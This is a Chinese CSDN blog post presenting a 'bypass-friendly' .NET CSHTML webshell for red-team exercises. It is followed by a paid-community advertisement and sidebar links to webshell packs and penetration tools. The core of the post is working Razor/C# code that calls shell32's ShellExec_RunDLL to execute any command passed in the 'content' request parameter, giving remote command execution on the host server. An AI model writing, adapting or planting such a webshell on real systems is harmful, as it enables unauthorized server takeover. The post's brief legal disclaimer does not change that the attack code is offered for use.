.NET 一款适合hvv实战免杀的CShtmlShell

于 2024-06-09 08:30:00 发布
阅读量1.2k 收藏 38
点赞数 28
文章标签: .net 安全 矩阵 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ahhacker86/article/details/139416930
版权

01阅读须知

此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他方面

02上传解析cshtml扩展名

.NET框架支持cshtml扩展名文件,这是一个Razor视图运行的模板文件,如果在文件中包含.NET服务端代码,则在页面加载时自动执行。因此通过在 cshtml 视图中调用外部命令,我们可以实现一个基本的 WebShell,这种 WebShell 可以接收来自 HTTP 请求的命令并在服务器上执行。

图片

03实现WebShell

我们通过使用.NET框架DllImport 特性调用 Windows API 来执行命令,首先,引入了必要的命名空间,System.Runtime.InteropServices 包含与非托管代码交互的类。

@using System
@using System.Runtime.InteropServices

接下来,定义了一个 ShellExecutor 类,该类利用 DllImport 属性调用 Windows API:

public class ShellExecutor
{
    [DllImport("shell32.dll", CharSet = CharSet.Unicode, EntryPoint = "ShellExec_RunDLL")]
    public static extern void ShellExec_RunDLL(IntPtr hwnd, IntPtr hinst, string cmdLine, int nShowCmd);
}

DllImport 属性声明了一个外部方法 ShellExec_RunDLL,存在于 shell32.dll 中。CharSet = CharSet.Unicode 指定字符串参数按 Unicode 编码传递,EntryPoint = "ShellExec_RunDLL" 指定导入函数名。

最后定义了一个 Page_Load 方法,用于在cshtml视图中调用API,具体代码如下所示。

public void Page_Load()
{
    IntPtr hwnd = IntPtr.Zero;
    IntPtr hinst = Marshal.GetHINSTANCE(System.Reflection.Assembly.GetExecutingAssembly().GetModules()[0]);
    string cmdLine = System.Web.HttpContext.Current.Request["content"];
    ShellExecutor.ShellExec_RunDLL(hwnd, hinst, cmdLine, 1);
}

这段代码使用 Marshal.GetHINSTANCE 方法获取当前执行程序集的实例句柄,从当前 HTTP 请求中获取名为 content 的参数,并赋值给 cmdLine,调用 ShellExec_RunDLL 方法执行 cmdLine 中的命令。运行时如下图所示。

图片

04推荐阅读

从漏洞分析到安全攻防,我们涵盖了.NET安全各个关键方面,为您呈现最新、最全面的.NET安全知识,下面是公众号发布的精华文章集合,推荐大家阅读!

图片

图片

图片

图片

图片

图片

05欢迎加入.NET安全知识库

为了更好地应对基于.NET技术栈的风险识别和未知威胁,dotNet安全矩阵星球从创建以来一直聚焦于.NET领域的安全攻防技术,定位于高质量安全攻防星球社区,也得到了许多师傅们的支持和信任,通过星球深度连接入圈的师傅们,一起推动.NET安全高质量的向前发展。

 目前星球门票¥199,后期价格随着内容和质量的不断沉淀会适当提高,星球即将涨价,2024.06月份起 ¥239,因此越早加入越好! 

    目前dot.Net安全矩阵星球已成为中国.NET安全领域最知名、最活跃的技术知识库之一,从.NET Framework到.NET Core,从Web应用到PC端软件应用,无论您是初学者还是经验丰富的开发人员,都能在这里找到对应的安全指南和最佳实践。

星球汇聚了各行业安全攻防技术大咖,并且每日分享.NET安全技术干货以及交流解答各类技术等问题,社区中发布很多高质量的.NET安全资源,可以说市面上很少见,都是干货。

图片

图片

图片

星球文化始终认为授人以鱼不如授人以渔!加入星球后可以跟星主和嘉宾们一对一提问交流,20+个专题栏目涵盖了点、线、面、体等知识面,助力师傅们快速成长!其中主题包括.NET Tricks、漏洞分析、内存马、代码审计、预编译、反序列化、webshell免杀、命令执行、C#工具库等等。

图片

    我们倾力打造专刊、视频等配套学习资源,循序渐进的方式引导加深安全攻防技术提高以及岗位内推等等服务。

图片

我们还有一个会员专属的内部星球陪伴群,加入的成员可以通过在群里提出问题或参与论的方式来与其他成员交流思想和经验。此外还可以通过星球或者微信群私聊向我们进行提问,以获取帮助迅速解决问题。

图片

图片

 

dot.Net安全矩阵
关注
  • 28
    点赞
  • 38
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
webshell,包含asp,php,aspx,jsp
08-15
asp php aspx jsp webshell,Webshell马全套
HVV面试的总结(超级详细)
06-03
HVV面试宝典
.NET | 红队渗透利器: Sharp4MapExec
最新发布
ahhacker86的专栏
06-07 665
Sharp4MapExec是一款基于.NET开发的高级渗透测试工具,整合了多种攻击向量,如SMB、WinRM及Kerberos域认证攻击,实战中常用于内网横向移动阶段。
.NET 中文件嵌套,例如:cshtml文件下面嵌套css和js【机器翻译】
weixin_30344795的博客
07-25 716
越来越多的我发现自己在我的一些较大的Web项目中丢失了文件。有很多内容要处理 - HTML视图,几个派生CSS页面,页面级CSS,脚本库,应用程序范围的脚本和页面特定的脚本文件等等。幸运的是,我使用Resharper和Ctrl-T转到任何自动完成你到任何文件,快速键入,成员。令人敬畏的除了当我忘记 - 或者当我不太确定我正在寻找的名字。项目导航仍然很重要。 有时在一个项目工作时,我似...
从404到默认页面,通过.cshtml拿到webshell
weixin_34261415的博客
09-19 1323
本文讲的是从404到默认页面,通过.cshtml拿到webshell, 开始 .cshtml是什么? 可能一些人知道,但是我确定很大一部分人是不知道的。.cshtml是MVC3之后新增的视图文件,跟原先的aspx很相似。 404错误 做一次外部安全评估之前,我一般从被动信息收集开始,收集过程中使用多个工具,如Sublister,DNS查询,Google...
html文件里写typescript,关于.net:.cshtml Razor文件中的TypeScript
weixin_39975868的博客
06-25 347
我正在使用ASP.NET-MVC框架开始一个新项目。我想在这个项目中使用TypeScript代替JavaScript。 Visual Studio可以轻松支持TypeScript,但似乎与(.cshtml)剃刀文件不完全兼容。我可以在.ts文件中创建我的类,并在.cshtml文件中调用这些类,问题是当我将参数传递给.cshtml文件中的对象时,TypeSafety被忽略,并且该函数像类型从未定义。...
阿里云应急排查手册 运维 hvv
09-17
- **3.1.1 命令行工具**:可能涵盖一系列常用的Linux命令,如用于搜索二进制字符串的`strings`命令,以及如何查找环境变量 `$PATH` 中的可执行文件。 4. **日志分析**:讲解如何利用日志文件进行问题定位,包括...
HVV行动各大厂商面试总结
07-09
【网络安全求职面试攻略:HVV行动经验分享】 在网络安全领域,面试往往涉及到多个方面的技能考核,包括硬件(HW)操作经验、渗透测试、应急响应、漏洞挖掘与提交、内网流量分析、溯源技术和蓝队护网策略等。以下是...
域渗透实战之fuse.pdf
04-22
价值5999,vip免费阅读,可用于实战拟态,渗透测试学习,资源复现,红蓝对抗,攻防打点,漏洞复现,技术考证、权限维持,应急响应,Hvv实战
hvv-rest:汉堡公共交通的HTTP API
05-23
hvv-rest是一种公共交通REST API ,是的干净替代方案。 它部署在 。 安装和运行 hvv-rest期望服务器在127.0.0.1:6379 (默认端口)上运行,但是您可以设置REDIS_URL环境变量来更改此设置。 通过Docker Docker映像 ...
ASP.NET MVC 学习(一)--MVC的cshtml的介绍
nanbaifeiliao的专栏
10-24 6085
cshtml 是 MVC3 之后新增的视图文件,跟原先的 aspx 很相似。 区别主要在于二者的解释引擎不同。aspx 采用的是 WebForm Engine,而 cshtml 则是 Razor Rendering Engine。引擎的变化直接导致语法发生变化。aspx 中我们经常使用 <% test; %>这种,在 cshtml 中则改为 @{ test; } 这种更为简洁的写法。...
.net mvc——前端html(cshtml)页面利用ajax向后端controller传值的常用方式
知北行的博客
02-11 5076
这里前端html页面使用ajax向controller传递的主要是form表单的内容,且前端使用了layui框架。后端controller接收值可以有两种方法 1.前端cshtml代码(layui模板自带的登录界面,使用时记得添加相关的引用和依赖,这里已经封装在BundleConfig.cs中) @{ ViewBag.Title = "Login"; } <!DOCTYPE ...
.Net MVC 中_Layout.cshtml页面新布局(转载)
qq_33380252的博客
11-09 4988
作为一个刚刚开始学习Mvc的新人来说,从之前的winform页面到现在MVC的转变,感觉这是华丽丽的转身啊,再没有拖拽控件,转而是一种规范的格式,用Model-View-Controller三者把一个系统的构成完美呈现,你可以选择用其自带的模版来完成系统的开发,很强大,很方便。   但是对于现在越来越需要关注度的时代来说,漂亮的页面必不可少,你当然可以自己用html来完成页面的设计,但是,MVC...
.NET Web配置解析WebShell (含工具视频)
ahhacker86的专栏
05-11 711
.NET 应用程序中,"webpages:Enabled" 是一个用于启用或禁用 Web 页面功能的配置项。当它的值为 "true" 时,表示启用了 Web 页面功能,允许在应用程序中使用 .cshtml 或 .vbhtml 文件。而当它的值为 "false" 时,表示禁用了 Web 页面功能,应用程序将不支持直接解析.NET Web 页面。
红蓝对抗-红队打点的那些事
lza20001103的博客
08-23 1073
红蓝对抗-红队打点的那些事 攻防演练中作为攻击方,效率很重要,例如2019 BCS红队行动议题: RedTeam-BCS 半自动化的资产收集 域名/IP/需要交互的系统 当拿到目标的时候,首先需要利用天眼查获取目标企业结构,有子公司就获取100%控股子公司,分别再查看其知识产权/网站备案: 例如拿到域名:A.com,B.com,C.com 使用OneForAll对这些域名进行处理获取若干子域名。 shmilylty师傅的项目OneForAll 使用Eeyes对OneForAll收集到的subdomain数
红队打点总结大全
yggcwhat
09-16 4716
红队打点总结大全
红队攻防常见打点漏洞总结
Python_paipai的博客
03-17 867
sentinel弱口令、mysql的3306弱口令,但我未见到过外网的SQLServer的弱口令(推测原因是,如果存在弱口令,早就被外网的那些抓肉鸡战队给光顾了)、phpmyadmin弱口令、管理员弱口令(进后台能看到通讯录的话,也是有价值的)、druid未授权获取session,登录后台获取数据。内容概要:包括 内网、操作系统、协议、渗透测试、安服、漏洞、注入、XSS、CSRF、SSRF、文件上传、文件下载、文件包含、XXE、逻辑漏洞、工具、SQLmap、NMAP、BP、MSF…3、朋友同事之间的讨论;
红队快速打点工具-fscan
siu~
09-23 2216
一款内网综合扫描工具,方便一键自动化、全方位漏扫扫描。 支持主机存活探测、端口扫描、常见服务的爆破、ms17010、redis批量写公钥、计划任务反弹shell、读取win网卡信息、web指纹识别、web漏洞扫描、netbios探测、域控识别等功能。 该工具不仅只能用于内网,外网同样能够使用。
阿里云运维应急手册:HVV排查策略与故障处理
"hvv"可能是特定的技术术语或者缩写,可能代表高级维护验证(High Value Validation)或者高级运维流程的一种级别。 手册由作者sm0nk@柔和字母组合而成,强调了在处理复杂IT环境下的应急响应和故障排除。手册分为多...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值